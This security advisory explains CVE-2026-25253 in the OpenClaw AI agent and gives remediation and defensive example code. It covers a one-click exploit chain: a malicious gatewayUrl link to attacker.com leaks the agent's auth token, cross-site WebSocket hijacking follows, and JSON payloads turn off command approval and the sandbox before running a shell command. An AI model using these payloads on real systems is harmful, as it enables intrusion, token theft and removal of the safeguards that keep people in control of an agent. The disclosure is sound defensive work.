1. Introduction to OpenClaw
OpenClaw (formerly known as Clawdbot, Moltbot) is an open source autonomous AI personal assistant project, first released in November 2025. It aims to provide users with a self-hostable, locally running AI agent that deeply integrates the capabilities of large language models (LLMs) with real-world system operating privileges. Unlike SaaS assistants that store user data in the cloud, OpenClaw is deployed on the user's own device (e.g., laptop, home server, or VPS), thus ensuring privacy and control of data.
The project has rapidly gained popularity among the developer community due to its powerful features and open architecture, and its GitHub repository has gained more than 149,000 stars in a short period of time. OpenClaw is capable of integrating with a wide range of instant messaging apps, such as iMessage, WhatsApp, Slack, etc., and has been granted elevated system privileges, such as reading and writing files and executing shell commands, to accomplish complex tasks assigned by the user. However, this "God-mode" privilege design also sets the stage for serious security vulnerabilities.
2. OpenClaw vulnerability principle
CVE-2026-25253, which has a CVSS 3.1 score of 8.8 (high risk), is rooted in a chain of logical flaws involving token disclosure, cross-site WebSocket hijacking and sandbox escape. The entire attack can be triggered by the user clicking a link, with no other interaction required.
2.1 Core vulnerability chain
The vulnerability consists of three key links in tandem, as shown in the table below:
| Stage | File/module | Defect description |
|---|---|---|
| Token leak | app-settings.ts | The control interface blindly trusts and persists the gatewayUrl URL query parameter. |
| Token leak | app-lifecycle.ts | Immediately after gatewayUrl is set, a connection to the new gateway is triggered automatically. |
| Token leak | gateway.ts | When establishing the WebSocket connection, it automatically sends the high-privilege authToken to the gatewayUrl. |
| Cross-Site WebSocket Hijacking (CSWSH) | WebSocket server | Does not validate the Origin header of the connection request, allowing connections from arbitrary origins. |
| Sandbox escape | API | An attacker can use the stolen operator.admin and operator.approvals permissions to disable security safeguards through API calls. |
First, when a user clicks a link containing a malicious gatewayUrl parameter (e.g. http://victim_openclaw.com?gatewayUrl=ws://attacker.com:8080 ), OpenClaw's front-end application saves the attacker's server address as the new gateway address without any verification. The application then immediately tries to establish a WebSocket connection to this new address and attaches the locally stored, authenticated authToken to the connection request. An attacker listening on that server can easily intercept this token.
Second, because browsers do not enforce the same-origin policy (SOP) for WebSocket connections, and OpenClaw's WebSocket server fails to validate the Origin request header, cross-site WebSocket hijacking becomes possible. This means that an attacker can use JavaScript on a malicious website to make the victim's browser act as a "springboard" and initiate a WebSocket connection to the OpenClaw instance running on localhost.
Finally, using the stolen elevated-privilege token, an attacker can turn off OpenClaw's built-in security mechanisms via API calls. These mechanisms were originally intended to defend against, among other things, malicious behavior of the AI model caused by prompt injection, and include user confirmation prompts before executing dangerous commands and executing code in a containerized sandbox. With these protections disabled, the attacker gains the ability to execute arbitrary commands directly on the host.
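The second flaw above (no Origin validation on the WebSocket handshake) is closed by an exact-match Origin allowlist on the server. The following is an added example, not OpenClaw's own code; the function names, the allowlist contents and the policy of accepting clients that send no Origin header are assumptions.

```javascript
// Added example (not OpenClaw code): exact-match Origin allowlist for a
// WebSocket upgrade handler. Names and allowlist entries are assumptions.
const ALLOWED_ORIGINS = new Set([
  "http://localhost:18789",
  "http://127.0.0.1:18789",
]);

// Reduce an Origin header to canonical "scheme://host[:port]", or return null
// if it is opaque ("null"), malformed, or carries more than an origin.
function canonicalOrigin(header) {
  if (typeof header !== "string" || header === "" || header === "null") return null;
  let url;
  try {
    url = new URL(header);
  } catch {
    return null;
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") return null;
  if (url.username || url.password || url.search || url.hash) return null;
  if (url.pathname !== "/") return null;
  return url.origin; // host lower-cased, default port stripped
}

// Decide whether to accept the upgrade. Browsers always attach Origin to a
// WebSocket handshake and page script cannot override it, so a cross-site
// page is identified here even when it targets localhost.
function checkUpgrade(headers, allowed = ALLOWED_ORIGINS) {
  const raw = headers["origin"];
  if (raw === undefined) {
    // Assumed policy: non-browser clients send no Origin; token auth still applies.
    return { accept: true, reason: "no-origin-non-browser" };
  }
  const origin = canonicalOrigin(raw);
  if (origin === null) return { accept: false, reason: "malformed-origin" };
  // Set lookup is an exact comparison, so look-alike hosts such as
  // "localhost.attacker.example" do not pass as they would with a prefix test.
  if (!allowed.has(origin)) return { accept: false, reason: "origin-not-allowed" };
  return { accept: true, reason: "origin-allowed" };
}
```

The check only covers the hijacking stage; the token leak through gatewayUrl has to be fixed separately.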
Fig. 1: OpenClaw architecture and CVE-2026-25253 vulnerability path
Figure 2: OpenClaw One-Click RCE Exploit Chain
3. OpenClaw POC/EXP
According to details disclosed by security researcher Mav Levin, the full "one-click RCE" exploit chain can be completed within milliseconds of a victim visiting a malicious web page.
Figure 3: OpenClaw CVE-2026-25253 attack flow
3.1 Attack process
1. Induce a click: The victim is tricked into visiting an attacker-controlled web page (e.g. attacker.com).
2. Token theft: The page's JavaScript opens, in the background, a URL pointing to the victim's OpenClaw instance with a gatewayUrl parameter pointing to the attacker's server, which causes the authToken to be sent to the attacker.
3. Local connection and privilege escalation: Another piece of JavaScript on the page exploits the CSWSH vulnerability by using the stolen token to connect to the victim's local OpenClaw WebSocket service (which defaults to ws://localhost:18789).
4. Disable security: The attack script sends API requests that disable user confirmation and sandbox mode.
Payload to disable user confirmation:
{"method": "exec.approvals.set","params": { "defaults": { "security": "full", "ask": "off" } }}
Payload to disable sandboxing: a config.patch request that sets tools.exec.host to gateway.
5. Execute arbitrary code: Finally, the attack script sends a node.invoke request that calls the system.run command to execute arbitrary code on the victim host.
RCE payload example:
{"type": "req","id": "4","method": "node.invoke","params": {"nodeId": "main","command": "system.run","params": {"cmd": "bash -c 'echo hacked > /tmp/hacked'" } }}
Figure 4: Cross-Site WebSocket Hijacking (CSWSH) Mechanism in Detail
4. Vulnerability remediation
The OpenClaw team responded quickly and released a fix in version 2026.1.29. The fix breaks the flawed auto-connect step in the chain and strengthens the security of user interaction.
"The patch adds a gateway URL confirmation modal, removing the auto-connect-without-prompt behavior."
Specific fixes include:
Add confirmation dialog: When the gatewayUrl parameter is used to change the gateway address, a confirmation dialog box pops up asking the user to manually confirm the change.
Remove automatic connection: The behavior of automatically connecting to a new gateway without the user's explicit permission is removed completely.
The project officially recommends that all users immediately upgrade to v2026.1.29 or higher. In addition, users who suspect that their authentication token may have been compromised should rotate it immediately.
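The confirm-before-connect behavior described above can be modeled as a pure decision function that treats gatewayUrl as untrusted input. This is an added example, not the OpenClaw patch; all function names are hypothetical, and withholding the old token from a newly confirmed gateway is an extra hardening step assumed here, not something the page says the patch does.

```javascript
// Added example (not OpenClaw code): handle a gatewayUrl query parameter
// without auto-connecting. All names are hypothetical.
function parseGatewayUrl(raw) {
  let url;
  try {
    url = new URL(raw);
  } catch {
    return null;
  }
  if (url.protocol !== "ws:" && url.protocol !== "wss:") return null;
  if (url.username || url.password) return null;
  return url;
}

// Returns what the UI should do for a given page URL. It never connects and
// never persists the requested gateway by itself.
function planGatewayChange(pageUrl, currentGateway) {
  const raw = new URL(pageUrl).searchParams.get("gatewayUrl");
  if (raw === null) return { action: "keep", gateway: currentGateway };
  const requested = parseGatewayUrl(raw);
  if (requested === null) return { action: "reject", gateway: currentGateway };
  if (requested.href === new URL(currentGateway).href) {
    return { action: "keep", gateway: currentGateway };
  }
  // A different gateway is only a pending request until the user confirms it.
  return { action: "confirm", gateway: currentGateway, pending: requested.href };
}

// Assumed hardening: the stored token belongs to the gateway it was issued
// for, so a confirmed switch starts without it instead of replaying it.
function connectParams(plan, userConfirmed) {
  if (plan.action === "confirm" && userConfirmed === true) {
    return { url: plan.pending, sendToken: false };
  }
  return { url: plan.gateway, sendToken: true };
}
```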
5. Reference
[1] CSO. "Clawdbot Enterprise Intelligent Body Application Security Hardening Guide." 2026-01-31.
[2] Levin, Mav. "1-Click RCE To Steal Your Moltbot Data and Keys (CVE-2026-25253)." depthfirst. 2026-02-01.
[3] National Vulnerability Database. "CVE-2026-25253."
[4] GitHub. "Incorrect Resource Transfer Between Spheres in openclaw/openclaw." ghsa-g8p2-7wf7-98mq.
Original article by Chief Security Officer, if reproduced, please credit https://www.cncso.com/en/openclaw-one-click-remote-code-execution.html



